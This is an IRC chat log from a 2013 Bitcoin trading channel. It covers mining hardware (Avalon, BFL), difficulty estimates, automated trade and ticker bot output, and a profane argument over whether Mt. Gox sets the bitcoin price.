my F5 took a beating Mar 23 12:54:28 lol, I wish I had an Avalon Mar 23 13:01:41 ;;bc,stats Mar 23 13:01:43 Current Blocks: 227574 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 233 blocks | Next Difficulty In About: 1 day, 1 hour, 32 minutes, and 3 seconds | Next Difficulty Estimate: 6608097.13894 | Estimated Percent Change: 36.31556 Mar 23 13:05:47 wow going to be a big jump... Mar 23 13:07:55 even with that new difficulty jump an Avalon more than pays for itself in a week Mar 23 13:08:10 not in 3 months Mar 23 13:08:31 don't know what the diff will be in 3 months... Mar 23 13:08:47 [BTCTC] [B.YABMC] 60 @ 0.01301 = 0.7806 BTC [-] Mar 23 13:09:04 Next Difficulty Estimate: 6608097.13894 | Mar 23 13:09:18 at that level still 1 week Mar 23 13:09:48 so those receiving their avalons now should prob be good Mar 23 13:11:05 hi all, look what is brewing: https://bitcointalk.org/index.php?topic=156641.0 Mar 23 13:11:15 old Mar 23 13:11:47 [BTCTC] [B.YABMC] 6 @ 0.01101 = 0.0661 BTC [-] Mar 23 13:11:49 [BTCTC] [B.YABMC] 9 @ 0.01 = 0.09 BTC [-] Mar 23 13:11:56 its nice of him though Mar 23 13:11:56 [MPEX] [S.MPOE] 9386 @ 0.00068991 = 6.4755 BTC [+] Mar 23 13:12:09 but the last comment "OKPAY should be refunded, too" may cause quite a shitstorm Mar 23 13:12:23 why only miners, srsly? Mar 23 13:12:49 [BTCTC] [BTC-TRADING-PT] 100 @ 0.1697 = 16.97 BTC [+] Mar 23 13:15:20 avoorhees should ask for refunds, too if he lost anything.. wanna see what would the reply to *that* lol Mar 23 13:15:30 [MPEX] [S.MPOE] 786 @ 0.00069904 = 0.5494 BTC [+] Mar 23 13:17:41 jurov myeah Mar 23 13:18:32 999.9995 btc Mar 23 13:19:03 So who here will buy avalon3 Mar 23 13:20:30 ;;ticker Mar 23 13:20:30 BTCUSD ticker | Best bid: 65.85829, Best ask: 65.90000, Bid-ask spread: 0.04171, Last trade: 65.90000, 24 hour volume: 138785.79606428, 24 hour low: 52.34560, 24 hour high: 73.49500, 24 hour vwap: 64.08160 Mar 23 13:21:03 i will probably Mar 23 13:21:37 i lol'd at your bfl vs avalon comparison Bowjob Mar 23 13:21:58 any news on the bfl front? Mar 23 13:22:05 delay Mar 23 13:22:21 Actually, I had half a mind to plot all of BFL's delays on a chart Mar 23 13:22:27 it's gotten to the point where "omg bfl shipping" => instatroll Mar 23 13:22:28 lol...in other news the sky is still blue Mar 23 13:22:36 yeah Mar 23 13:22:37 Bowjob i never saw that compariosn ? Mar 23 13:22:52 any idea when avalon batch 3 will go on sale? Mar 23 13:23:04 it's on sale now i thought Mar 23 13:23:05 damien, very soon. like 1-2 day soon Mar 23 13:23:06 https://bitcointalk.org/index.php?topic=156767.msg1662592#msg1662592 Mar 23 13:23:13 ah great Mar 23 13:23:15 http://store.avalon-asics.com Mar 23 13:23:16 I haven't made the chart yet. Mar 23 13:23:24 anyone here remember the walletbit fiasco ? Mar 23 13:23:24 haha Mar 23 13:23:27 nice post Mar 23 13:23:33 yes Mar 23 13:23:42 MNW asked me about avalon 3 too Mar 23 13:23:42 lol Mar 23 13:23:43 Bowjob: i dont understand that pic =I Mar 23 13:23:52 mnw hasnt replied me :(( Mar 23 13:23:59 The first picture is box of fans Mar 23 13:24:10 second picture is the avalon asic Mar 23 13:24:50 At this point I believe batch 3 will still be profitable Mar 23 13:25:01 since, having >20k pre orders.. is a nightmare Mar 23 13:25:38 duh Mar 23 13:26:03 i still dont get it xD Mar 23 13:26:52 [BTCTC] [S.BBET-PT] 10 @ 0.00151 = 0.0151 BTC [-] Mar 23 13:26:54 [BTCTC] [S.BBET-PT] 10 @ 0.0015 = 0.015 BTC [-] Mar 23 13:28:01 [BTCTC] [S.BBET-PT] 1 @ 0.00142 BTC [-] Mar 23 13:28:03 [BTCTC] [S.BBET-PT] 12 @ 0.0014 = 0.0168 BTC [-] Mar 23 13:28:17 I think so too Mar 23 13:28:47 they are projecting that when you get it the difficulty will be a lot higher Mar 23 13:29:16 10 million you still pay it off in a month Mar 23 13:29:30 diff not price Mar 23 13:29:46 its stilla good buy, it will just put off many people Mar 23 13:30:05 i wouldn't pay them 3x if it brought about the end of the world. Mar 23 13:30:08 I considered ordering 5 more avalons if it was 5x Mar 23 13:30:08 prices go down not up. Mar 23 13:30:14 *1.5 Mar 23 13:31:17 we should all ask bfl_josh about his seppuku ritual on april 1st Mar 23 13:31:19 :) Mar 23 13:33:31 ;;ticker Mar 23 13:33:31 BTCUSD ticker | Best bid: 64.00000, Best ask: 64.10172, Bid-ask spread: 0.10172, Last trade: 64.10172, 24 hour volume: 140056.39573591, 24 hour low: 52.34560, 24 hour high: 73.49500, 24 hour vwap: 64.07680 Mar 23 13:36:56 well, the price is in some way tied to the difficulty Mar 23 13:37:13 I don't know the exact formula Mar 23 13:37:15 How so? Mar 23 13:37:34 the price is a function of the difficulty Mar 23 13:37:43 that is by design I think Mar 23 13:37:58 but I know that that is the case Mar 23 13:38:06 price whatever someone is willing to give you for it. Mar 23 13:38:14 For which manufacturer? Mar 23 13:38:23 not when I put 90 BTC on my website Mar 23 13:38:24 One really prices based on difficulty? Mar 23 13:38:27 Avalon Mar 23 13:38:31 odd Mar 23 13:38:38 ok... I'll be AFK Mar 23 13:38:46 that is what that one manufacturer is choosing to do Mar 23 13:39:07 you have to realize the motives of Avalon Mar 23 13:39:16 and it isn't purely profit **** BEGIN LOGGING AT Sat Mar 23 17:02:32 2013 Mar 23 17:06:02 [HAVELOCK] [SDICE] 1 @ 0.51 BTC [-] Mar 23 17:10:03 ;;ident Mar 23 17:10:03 You are not identified. Mar 23 17:10:17 ;;ident Mar 23 17:10:17 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address 1LokQrHj14NU93tC6pZfTZyyRHhAVakQmX Mar 23 17:11:12 ha ha Mar 23 17:11:29 [BTCTC] [S.DICE-PT] 1 @ 0.00402 BTC [-] Mar 23 17:11:29 gamma bitcoin fund Mar 23 17:11:30 ;;ident Mar 23 17:11:31 You are not identified. Mar 23 17:18:14 [MPEX] [S.DICE] 100 @ 0.0044444 = 0.4444 BTC [+] Mar 23 17:27:41 mjr you shoukd stop try stupid challenge Mar 23 17:27:42 [BTCTC] [S.DICE-PT] 2 @ 0.00402 = 0.008 BTC [-] Mar 23 17:27:46 http://www.youtube.com/watch?v=1m5IzMuVM1o&list=UU7vzAZjh_HRRuvFzbzeTkjg&index=1 Mar 23 17:29:07 upgraded Mirc Mar 23 17:29:20 [BTCTC] [S.DICE-PT] 38 @ 0.004099 = 0.1558 BTC [+] Mar 23 17:29:20 trying to reinitialize the script that auto-challenges Mar 23 17:29:38 [BTCTC] [COGNITIVE] 1 @ 0.16 BTC [+] Mar 23 17:31:05 lol Mar 23 17:31:08 who is that kid? Mar 23 17:31:32 thats just great...of all the people who could have had my name Mar 23 17:31:35 :( Mar 23 17:36:40 [MPEX] [S.MPOE] 5136 @ 0.00070068 = 3.5987 BTC [+] Mar 23 17:36:43 [MPEX] [S.MPOE] 4268 @ 0.00070069 = 2.9905 BTC [+] Mar 23 17:37:53 maybe he knows this kid http://www.2atoms.com/comedy/worstoftheweb/blount.htm Mar 23 17:39:44 lol bitinstant > The shitty thing is that the last time I sent Shrem an e-mail it bounced. And I got the message: Could wait no longer, mailbox full. Mar 23 17:45:03 [HAVELOCK] [SDICE] 6 @ 0.51 = 3.06 BTC [-] Mar 23 17:51:49 is that cads guy still around Mar 23 17:52:42 it's like he just came out of nowhere asking for mpex to be made, and the chan was like "/me points to mpex" Mar 23 17:53:31 indeed, just finished backlog Mar 23 17:58:54 https://news.ycombinator.com/item?id=5427985 some little peeks into coinbase innards Mar 23 17:59:14 [BTCTC] [GSDPT] 14 @ 0.004639 = 0.0649 BTC [+] Mar 23 18:00:54 [BTCTC] [S.MPOE-PT] 2 @ 0.000677 = 0.0014 BTC [-] Mar 23 18:01:47 [BTCTC] [S.BBET-PT] 2 @ 0.0014 = 0.0028 BTC [-] Mar 23 18:02:20 http://www.mongodb.org/about/production-deployments/ Mar 23 18:02:25 Coinbase uses MongoDB for their primary datastore for their web app, api requests, etc. Coinbase is a decentralized, digital currency that is changing the world of payments. Mar 23 18:02:34 Coinbase is Bitcoin? Mar 23 18:02:36 nice Mar 23 18:05:23 they also use macs Mar 23 18:05:35 dont trust em with a coin. Mar 23 18:07:03 [HAVELOCK] [VTX] 1 @ 0.5840001 BTC [-] Mar 23 18:09:03 [HAVELOCK] [VTX] 29 @ 0.584 = 16.936 BTC [-] Mar 23 18:10:02 [HAVELOCK] [VTX] 1 @ 0.5979999 BTC [+] Mar 23 18:10:04 [HAVELOCK] [VTX] 23 @ 0.598 = 13.754 BTC [+] Mar 23 18:13:06 ;;ticker Mar 23 18:13:13 ;;goxlag Mar 23 18:13:14 0 seconds Mar 23 18:13:20 Error: Failure to retrieve ticker. Try again later. Mar 23 18:24:15 bitinstant has like a 25% chance your transfer fails Mar 23 18:24:26 and it takes them up to 5 days to "push the coins through" Mar 23 18:30:49 (02:10) < tiberiusiv> zyphus you should exit (02:10) < tiberiusiv> single digits are not that far Mar 23 18:30:56 [BTCTC] [RSM] 1 @ 0.005 BTC [-] Mar 23 18:31:02 trolled these d00dz hard lastnight 'eh Mar 23 18:31:22 [BTCTC] [RSM] 1 @ 0.0044 BTC [-] Mar 23 18:31:48 [BTCTC] [RSM] 8 @ 0.00311 = 0.0249 BTC [-] Mar 23 18:32:05 i guess those guys were losing their minds Mar 23 18:33:15 mod6: lol Mar 23 18:33:29 one of them almost sold me their coins for 25 Mar 23 18:34:00 haha nice Mar 23 18:49:08 "electronic harmonic variance" sounds like shit spewed from a powerband salesman Mar 23 18:50:14 ;;tslb Mar 23 18:50:24 Time since last block: 51 minutes and 39 seconds Mar 23 18:50:24 hehe Mar 23 18:50:29 wtf Mar 23 18:50:47 ;;bc,stats Mar 23 18:50:50 Current Blocks: 227618 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 189 blocks | Next Difficulty In About: 21 hours, 17 minutes, and 44 seconds | Next Difficulty Estimate: 6606350.12053 | Estimated Percent Change: 36.27952 Mar 23 18:51:00 another fork? Mar 23 18:51:31 no... Mar 23 18:51:50 i don't see any orphand blocks yet.. http://blockchain.info/blocks Mar 23 18:51:58 maybe their client is just borkd Mar 23 18:52:14 my client is so far behind.... Mar 23 18:52:20 i only check because i have old tx waiting Mar 23 18:52:25 it's on the .7 though Mar 23 18:52:27 checked* Mar 23 18:52:31 ofc, i havn't sync'd in about 16 hours Mar 23 18:52:34 @.@ Mar 23 18:52:41 i hate starting it up cause it send my HD to 0 response time damn near Mar 23 18:52:54 mine is 70 days behind still Mar 23 18:53:13 it's most likely blockchain.info's client getting stuck Mar 23 18:53:20 bing Mar 23 18:53:25 ;;tslb Mar 23 18:53:28 Time since last block: 33 seconds Mar 23 18:53:34 sweet Mar 23 18:53:39 69k btc sent Mar 23 18:53:45 er, 60 Mar 23 18:53:50 ish Mar 23 18:59:02 [HAVELOCK] [VTX] 18 @ 0.5998888 = 10.798 BTC [+] Mar 23 19:00:03 [HAVELOCK] [SDICE] 7 @ 0.51 = 3.57 BTC [-] Mar 23 19:01:03 [HAVELOCK] [VTX] 13 @ 0.6 = 7.8 BTC [+] Mar 23 19:02:02 [HAVELOCK] [SDICE] 4 @ 0.51 = 2.04 BTC [-] Mar 23 19:15:04 [BTCTC] [S.DICE-PT] 62 @ 0.004099 = 0.2541 BTC [+] Mar 23 19:18:04 [HAVELOCK] [SDICE] 3 @ 0.4855 = 1.4565 BTC [-] Mar 23 19:21:45 [BTCTC] [S.DICE-PT] 67 @ 0.00361 = 0.2419 BTC [-] Mar 23 19:22:04 [HAVELOCK] [SDICE] 1 @ 0.485 BTC [-] Mar 23 19:22:05 [HAVELOCK] [SDICE] 1 @ 0.485 BTC [-] Mar 23 19:23:04 [HAVELOCK] [SDICE] 4 @ 0.48000002 = 1.92 BTC [-] Mar 23 19:23:36 ;;ticker Mar 23 19:23:36 BTCUSD ticker | Best bid: 65.10000, Best ask: 65.41901, Bid-ask spread: 0.31901, Last trade: 65.10000, 24 hour volume: 155857.54158041, 24 hour low: 52.34560, 24 hour high: 72.86999, 24 hour vwap: 63.91405 Mar 23 19:23:56 ;;asks 70 Mar 23 19:24:00 There are currently 9000.1244 bitcoins offered at or under 70.0 USD, worth 618708.528579 USD in total. | Data vintage: 0.0021 seconds Mar 23 19:24:03 [HAVELOCK] [VTX] 1 @ 0.6 BTC [+] Mar 23 19:24:18 ;;bids 60 Mar 23 19:24:19 There are currently 10059.132 bitcoins demanded at or over 60.0 USD, worth 624598.081772 USD in total. | Data vintage: 19.2737 seconds Mar 23 19:29:34 $vwap ^OIX Mar 23 19:29:35 mod6: 1 day: no data 7 day: average: 67.50931133 high: 70.0111051 low: 51.26011131 volume: 14605 btc: 3123.57547556 30 day: no data Mar 23 19:31:03 [HAVELOCK] [VTX] 1 @ 0.6 BTC [+] Mar 23 19:32:04 [HAVELOCK] [VTX] 5 @ 0.6 = 3 BTC [+] Mar 23 19:33:04 [HAVELOCK] [VTX] 19 @ 0.65 = 12.35 BTC [+] Mar 23 19:33:21 yep i was wrong about vtx Mar 23 19:33:24 this might be one of the more idiot posts in a while Mar 23 19:33:25 https://bitcointalk.org/index.php?topic=156960 Mar 23 19:33:59 We have a world to conquer out there, and we don't want to end up like Unix. Mar 23 19:34:01 wall of text almost killed me Mar 23 19:34:07 WRONG you want to end up exactly like unix Mar 23 19:34:44 the path of least resistance is where the river will follow and flow through, to meet his own anaology Mar 23 19:35:00 !last MPEX S.DICE Mar 23 19:35:01 Last trade for S.DICE on MPEX was at 0.0044444 BTC [+] Mar 23 19:35:14 and with UNIX, it's tried and true, open and tested. and loved by the best compsci people in the world for a /reason/ Mar 23 19:35:54 mircea_popescu & MPOE-PR are right, the btctalk people are turbo-idiots Mar 23 19:36:14 s/\?/\>/ Mar 23 19:36:48 =) Mar 23 19:37:16 well, i guess he's only had 3 posts. Mar 23 19:37:38 still, what a toolbox Mar 23 19:38:16 and I think since gox is all fuxd all the time with its price signals Mar 23 19:38:26 the OIX is simply getting to be a better ave Mar 23 19:40:16 http://bitcoincharts.com/charts/mtgoxUSD#rg30zig2-hourztgSzbgBza1gTMAzm1g30za2gTMAzm2g200zi1gMACDzi2gWilliamRzi3gCVolatilityzv Mar 23 19:42:04 the william % pattern on that chart is interesting Mar 23 19:42:15 i dunno, it seems pretty accurate, i guess because the price signals from gox fuel which strikes are most active.. Mar 23 19:42:19 the dips look the same Mar 23 19:42:48 but you can trade on MPEx evne through the heaviest and most coordinated DDoS attacks and it's solid Mar 23 19:43:02 sadly people use gox as indicator Mar 23 19:43:12 have to choose something Mar 23 19:43:15 the fact we hang on gox data so much needs to change imho Mar 23 19:43:21 ThickAsThieves: exactly Mar 23 19:43:35 it would be awesome if it was "just one signal for price" Mar 23 19:43:42 but its /the/ signal for price Mar 23 19:43:46 i really believe that when their suggested price gets stuck, it pulls down the whole market Mar 23 19:44:14 it gets stuck whenever there's a dip Mar 23 19:44:19 everyone else wants to sell their BTC to tiberiusiv for $25 if there is too low of vol and the price collapses Mar 23 19:44:26 coincidence or instigatation? Mar 23 19:44:52 i don't think anyone should choose anything per-se Mar 23 19:44:54 instigation* Mar 23 19:45:03 i mean, think of how they do gas-station pricing on price per gallon? Mar 23 19:45:07 gox market share is already declining Mar 23 19:45:21 but they arent used any less as a price Mar 23 19:45:42 they will be Mar 23 19:45:43 3 stations, three corners of the intersection. Mar 23 19:45:44 theres nothing wrong with the gox price Mar 23 19:46:03 [HAVELOCK] [SDICE] 3 @ 0.4792 = 1.4376 BTC [-] Mar 23 19:46:09 its the within the same range as all the other exchanges Mar 23 19:46:16 whats the difference whose price you use? gox at the moment simply is the most liquid Mar 23 19:46:39 mod6: gasoline is one of the most competitive markets around Mar 23 19:46:57 but arent 'all of the other sxchanges" basing decsisions on gox? Mar 23 19:47:03 [HAVELOCK] [SDICE] 2 @ 0.47915 = 0.9583 BTC [-] Mar 23 19:47:03 no Mar 23 19:47:10 of course not thickasthieves Mar 23 19:47:17 but... Mar 23 19:47:28 gox does NOT set bitcoin prices for everyone Mar 23 19:47:29 i dont use many exchanges so i cant say Mar 23 19:47:33 but the ones i use Mar 23 19:47:34 they simply have the most participants Mar 23 19:47:36 all trail gox Mar 23 19:47:47 becuase their liquidity is lower Mar 23 19:47:56 they dont trail gox, they just have less activity Mar 23 19:47:59 so it seems like it Mar 23 19:48:04 [HAVELOCK] [SDICE] 8 @ 0.479101 = 3.8328 BTC [-] Mar 23 19:48:04 i see it on campbx all the time Mar 23 19:48:13 price drops 5 Mar 23 19:48:15 [MPEX] [S.MPOE] 1300 @ 0.00070068 = 0.9109 BTC [-] Mar 23 19:48:17 [MPEX] [S.MPOE] 5000 @ 0.00070069 = 3.5035 BTC [+] Mar 23 19:48:21 then 30secs later it does on campbx Mar 23 19:48:30 lotsa bots out there Mar 23 19:48:39 using goxprice Mar 23 19:48:48 there needs to be a few more exchanges with just as much or more liquidity and volume which don't race eachother to "a bottom" but just find a happy stable price amongst themselfs Mar 23 19:48:55 like gas station pricing Mar 23 19:49:04 [HAVELOCK] [SDICE] 4 @ 0.4791005 = 1.9164 BTC [-] Mar 23 19:49:14 you know what I mean? Mar 23 19:49:14 they arent racing each other to a bottom Mar 23 19:49:21 you are an idiot Mar 23 19:49:25 lol Mar 23 19:49:30 the exchanges do not sell a product Mar 23 19:49:34 eeediot! Mar 23 19:49:36 gas stations sell a product Mar 23 19:50:02 exchanges are simply forums for people to gather and through the auction style set prices Mar 23 19:50:06 ;;gpg info tiberiusiv Mar 23 19:50:07 No such user registered. Mar 23 19:50:13 FUCK OF DICKWAD Mar 23 19:50:20 *OFF too :) Mar 23 19:50:32 you have 0 clue what you are talking about mod6 so be quiet :) Mar 23 19:51:25 thickasthieves: campbx is extremely *illiquid*, that is why it seems it lags mtgox Mar 23 19:51:37 there isnt enough participants on campbx Mar 23 19:51:40 but you dont think their bots influence price based on gox? Mar 23 19:51:47 no Mar 23 19:51:55 its not based on gox Mar 23 19:52:01 thats what the market is doing Mar 23 19:52:04 [HAVELOCK] [SDICE] 5 @ 0.478999 = 2.395 BTC [-] Mar 23 19:52:06 gox has nothing to do with it Mar 23 19:52:14 stfu Mar 23 19:52:27 participants needed US dollars for whatever reason so they sold bitcoins Mar 23 19:52:32 so the whole market coincidently drops $5 when gox does, with no relation? Mar 23 19:52:38 its simple as that, and there were no willing buyers to pickup that size Mar 23 19:52:52 so the price declines until buyers are willing to eat up the size offered Mar 23 19:53:03 [HAVELOCK] [SDICE] 10 @ 0.468999 = 4.69 BTC [-] Mar 23 19:53:09 even then, buyers are influenced by gox Mar 23 19:53:13 thickasthieves: the WHOLE market is 1 place. Mar 23 19:53:28 ... Mar 23 19:53:35 you fucking dipshit Mar 23 19:53:39 so if someone sells 10000 coins on gox Mar 23 19:53:40 if oil drops in the US Mar 23 19:53:40 thats what i've been trying to say Mar 23 19:53:42 it drops worldwide Mar 23 19:53:46 STFU Mar 23 19:53:50 lol Mar 23 19:53:52 what in the world are you doing her Mar 23 19:53:53 mod6: mtgox is not the whole market Mar 23 19:53:54 *here Mar 23 19:54:04 [HAVELOCK] [SDICE] 1 @ 0.44 BTC [-] Mar 23 19:54:09 i'm getting trolled or what? Mar 23 19:54:10 the market is fragmented. that's the issue. Mar 23 19:54:13 ;;bids 0 Mar 23 19:54:13 yes Mar 23 19:54:15 quit thinking exchanges are seperate markets Mar 23 19:54:15 There are currently 37048263 bitcoins demanded at or over 0.0 USD, worth 6222641.70973 USD in total. | Data vintage: 0.0152 seconds Mar 23 19:54:17 by eskimobob Mar 23 19:54:19 they arent Mar 23 19:54:24 they are the SAME market Mar 23 19:54:29 can you comprehend that concept? Mar 23 19:54:32 mt gox is the biggest so it gets the attention Mar 23 19:54:33 wait tiberius is eskimobob? Mar 23 19:54:52 i dont even know who that is Mar 23 19:54:53 without a liquid means of exchanging non-BTC funds among exchanges, i don't see how they're one market Mar 23 19:54:55 tiberiusiv: THey are the same market but there is friction in the links. Very similar to the natural gas market Mar 23 19:55:03 [HAVELOCK] [SDICE] 1 @ 0.43000001 BTC [-] Mar 23 19:55:26 Europe will pay much more than US if russia turns off the taps, but the effects are still felt globally Mar 23 19:55:32 there is 1 BTC market with many venues where to meet buyers or sellers Mar 23 19:55:35 i think its absurd to say that gox doesnt have influence on MANY fronts that influence price Mar 23 19:55:47 gox itself is just the most liquid of those venues Mar 23 19:55:52 thereby the most accurate Mar 23 19:55:55 tiberiusiv: this is a semantic argument Mar 23 19:55:55 the gox market definitely sets the price Mar 23 19:55:56 NO Mar 23 19:56:03 [HAVELOCK] [SDICE] 1 @ 0.43 BTC [-] Mar 23 19:56:08 my understanding of "market" is a place where buyers and sellers can exchange Mar 23 19:56:16 plot the prices of various exchanges vs. gox Mar 23 19:56:18 not just a specific type of asset Mar 23 19:56:24 gox leads all moves Mar 23 19:56:31 becuase its the most liquid Mar 23 19:56:36 from having the most participants Mar 23 19:56:40 yes Mar 23 19:56:48 It has the most volume by far Mar 23 19:56:52 the others only seem like that lag, because of lack of activity Mar 23 19:56:59 they DO lag Mar 23 19:57:00 they* Mar 23 19:57:02 they lead thru buyer using it as spot, thru bots using it, thru asset exchanges using, thru chart reports using it Mar 23 19:57:03 and how is that fucking different than what i was trying to say before you called me an idiot you faggot Mar 23 19:57:15 mod6: you are an idiot. Mar 23 19:57:20 you thought mtgox is a gas station Mar 23 19:57:27 they dont sell a product. Mar 23 19:57:31 ... Mar 23 19:57:33 im using it as a simple example dickweed Mar 23 19:57:42 its an incorrect example Mar 23 19:57:46 i expected someone as smart as yourself to know the differnce Mar 23 19:57:49 gox users do not pay attention to the price on any other exchange Mar 23 19:57:50 can i get diesel with bitcoin? Mar 23 19:57:56 you didnt know the difference between the 2 Mar 23 19:57:57 all other exchages pay attention to the gox price Mar 23 19:58:03 [HAVELOCK] [SDICE] 1 @ 0.42000001 BTC [-] Mar 23 19:58:09 GRRRRRR Mar 23 19:58:09 bugpowder: bots arbitrage all the exchanges Mar 23 19:58:10 my local bitcoins sale price is based on gox. Mar 23 19:58:12 seeking the best bids/asks Mar 23 19:58:17 you make me almost want to rage quit this shit Mar 23 19:58:22 therefore its ONE market Mar 23 19:58:26 mod6 stfu. Mar 23 19:58:29 tiberiusiv: too much transfer friction Mar 23 19:58:31 retarded gas station analogy Mar 23 19:58:32 NO YOU STFU Mar 23 19:58:35 relax mod6 Mar 23 19:58:37 bugpowder: yes at the moment Mar 23 19:58:38 just ignir ehim Mar 23 19:58:43 ignore* Mar 23 19:58:44 this point seems fairly academic though Mar 23 19:58:45 yea mtgox is a gas station Mar 23 19:58:51 on a street corner driving prices down Mar 23 19:58:54 lmao Mar 23 19:59:04 fucking child Mar 23 19:59:08 gox is more like the CME Mar 23 19:59:19 competing exchanges only drive down trading fees Mar 23 19:59:24 not BTC price Mar 23 19:59:34 lol Mar 23 19:59:37 anyway Mar 23 19:59:39 and there are other exchanges that trade pigs and steers and frozen concentrate OJ futures. But CME dominates them Mar 23 20:00:13 ;;ticker Mar 23 20:00:14 BTCUSD ticker | Best bid: 63.25112, Best ask: 63.97999, Bid-ask spread: 0.72887, Last trade: 63.97999, 24 hour volume: 159365.08473773, 24 hour low: 52.34560, 24 hour high: 72.86999, 24 hour vwap: 63.87592 Mar 23 20:00:23 still too early to buy calls Mar 23 20:00:26 like i said when Gox data freezes, like their socket, or more importantly, their suggested price in the Buybox, it effectively changes the price to that until it stops Mar 23 20:00:49 ThickAsThieves: I disagree. There price just becomes unknown. Mar 23 20:00:59 but when you log in to gox Mar 23 20:01:06 it doesnt indicate any problem Mar 23 20:01:11 traders with enough capital to move the market understand what is happening Mar 23 20:01:20 it just gets stuck at suggesting you pay 66 for 5 minutes Mar 23 20:01:25 maybe joe reddit with his 5 bitcoins gets confused Mar 23 20:01:32 but Bugpowder knows Mar 23 20:01:39 there are a lot of those Mar 23 20:01:56 yes and they whine alot too Mar 23 20:02:10 thats not the suggested price in the buy box Mar 23 20:02:12 thats the last price. Mar 23 20:02:19 their post volume vs BTC volume is all out of whack Mar 23 20:02:21 if it freezes or not means nothing Mar 23 20:02:35 last price means NOTHING. Mar 23 20:02:38 its the past. Mar 23 20:02:44 the 2 prices most important are BIDS and ASKS Mar 23 20:02:51 and the SIZEs Mar 23 20:03:01 yeah but the bid and ask are stale under high trading volume Mar 23 20:03:03 SR buyers, people who just buy when wthey get their deposits, people cashing out Mar 23 20:03:10 none pay much mind to the orderbooks Mar 23 20:03:18 sometimes they lag by 10 minutes Mar 23 20:03:25 gox buybox says, pay this price and you get your coins Mar 23 20:03:25 if you are cashing out you are paying attention to BIDS Mar 23 20:03:28 not to LAST price Mar 23 20:03:34 no it doesnt Mar 23 20:03:34 so just place your limit orders where you what to buy or sell and hope fulr the best Mar 23 20:03:35 ;;seen bulls Mar 23 20:03:35 I have not seen bulls. Mar 23 20:03:38 omg Mar 23 20:03:41 it simply says what the last sale was Mar 23 20:03:43 ;;seen bears Mar 23 20:03:43 [BTCTC] [S.DICE-PT] 57 @ 0.004159 = 0.2371 BTC [+] Mar 23 20:03:44 I have not seen bears. Mar 23 20:03:47 it doesnt say it literally, but effectively Mar 23 20:03:47 OMG Mar 23 20:03:51 thickasthieves go read a book. Mar 23 20:04:04 a seller looks for the bid, and a buyer looks for the ask Mar 23 20:04:04 [HAVELOCK] [VTX] 1 @ 0.64 BTC [-] Mar 23 20:04:09 Gox website price is horribly inaccurate. Mar 23 20:04:14 last price is just data on the past Mar 23 20:04:22 i know what fucking last price is Mar 23 20:04:26 gox website could be a blank page and it would make 0 difference Mar 23 20:04:31 under high load. Mar 23 20:04:33 but they PUT it in the bud box for you Mar 23 20:04:38 bidb box Mar 23 20:04:46 oh you guys and your semantical differences Mar 23 20:04:49 therefore Mar 23 20:04:50 lol Mar 23 20:04:51 its suggested Mar 23 20:04:57 market != market Mar 23 20:05:15 ambiguity fueling rage :D Mar 23 20:05:34 and you really want to underestimate the population's neglect of orderbooks when buying bitcoin? Mar 23 20:05:41 these people arent day traders Mar 23 20:05:50 I'm just annoyed that I had a 100BTC buy order at 52.139 that didn't quite get hit on the dip Mar 23 20:05:50 they cant neglect it. Mar 23 20:06:02 ;;ticker Mar 23 20:06:03 BTCUSD ticker | Best bid: 63.00001, Best ask: 63.12648, Bid-ask spread: 0.12647, Last trade: 63.00001, 24 hour volume: 159630.25515694, 24 hour low: 52.34560, 24 hour high: 72.86999, 24 hour vwap: 63.87384 Mar 23 20:06:05 when you buy BTC you can only buy what is offered at X price Mar 23 20:06:09 it doesnt mean jackshit what the last price was Mar 23 20:06:10 ThickAsThieves: people that ignore it are n00bs that don't move the market Mar 23 20:06:20 you cant ignore it, its impossible Mar 23 20:06:33 erryone trades on gox - chmod doesnt - is getting rich faster Mar 23 20:06:36 if i want to buy 10k BTC right now, i cant get it at the LAST porice Mar 23 20:06:42 What moves the market are people trading 100-10000 BTC. All of them know the game... At least after the first time they get goxraped. Mar 23 20:06:43 i have to buy it at whats being offered Mar 23 20:06:55 hard to say on one day that Cyprus or other good news causes btc to go up, yet the market isnt easily influenced on bid price Mar 23 20:06:57 thickasthieves you are clueless to markets. Mar 23 20:07:18 news tends to lag price Mar 23 20:07:42 BTC was already in an uptrend long before any cyprus news Mar 23 20:07:48 my bot used the mtgox order book to a given depth to determin spot Mar 23 20:07:59 tiberiusiv, yes Mar 23 20:08:06 smickles, how dare you! Mar 23 20:08:08 hehe Mar 23 20:08:14 2012 had huge positive btc news, yet the price was still LOWER then 2011. Mar 23 20:08:35 by the time something is news, its already OLD Mar 23 20:08:48 tiberiusiv: not always Mar 23 20:08:50 also, i feel most -otc trades go something like "i'll sell 1 btc", "at what rate?", "let me check gox, ;;ticker" Mar 23 20:08:51 so you think all this uptake to the current price is mostly big players, and not amatuer speculators? Mar 23 20:09:01 so in both those senses, gox sets the price Mar 23 20:09:06 bugpowder: almost always other then unexpected events Mar 23 20:09:07 ThickAsThieves: the current price is mostly big speculators Mar 23 20:09:18 not the company, mind you, the users Mar 23 20:09:23 bugpowder: notice how no one wanted to trade their house for BTC at $2, but now at 70 everyone wants BTC? Mar 23 20:09:23 can we actually know that? Mar 23 20:09:26 tiberiusiv: yes, in an efficent market. Cyprus was big news and unexpected. Mar 23 20:09:40 cyprus has been expected for over 2 years. Mar 23 20:09:45 tiberiusiv: i was trying to sell a house when btc was at 2 Mar 23 20:09:46 what are you talking about? Mar 23 20:09:48 for btc Mar 23 20:09:53 so you're a little off base Mar 23 20:10:00 lol smickles Mar 23 20:10:03 Deposit haircut was not anticipated Mar 23 20:10:07 i even put it in the -otc order book Mar 23 20:10:11 by the general market Mar 23 20:10:17 cyprus is 0.1% of the eurozone Mar 23 20:10:19 nor buy cypriots or russians Mar 23 20:10:27 ;;goxlag Mar 23 20:10:28 13.503203 seconds Mar 23 20:10:35 bugpowder: sure it was, all the major players already removed $ out of cyprus Mar 23 20:10:50 cyprus + mtgox--->USA + ASIC mining Mar 23 20:10:50 bugpowder: it wasnt expected by the idiots who stayed Mar 23 20:11:03 lots of external factors affecting price right now besides trading Mar 23 20:11:04 splnkr: nice chart Mar 23 20:11:19 well... back down to $50 today? Mar 23 20:11:24 bugpowder: majority of russian funds were converted into german bonds over a year ago. Mar 23 20:11:43 hence why german paper had negative interest rates Mar 23 20:11:43 in summary, gox influences price heavily, i have not heard a sound argument otherwise Mar 23 20:12:04 considering gox is 80% of participants Mar 23 20:12:09 of course its 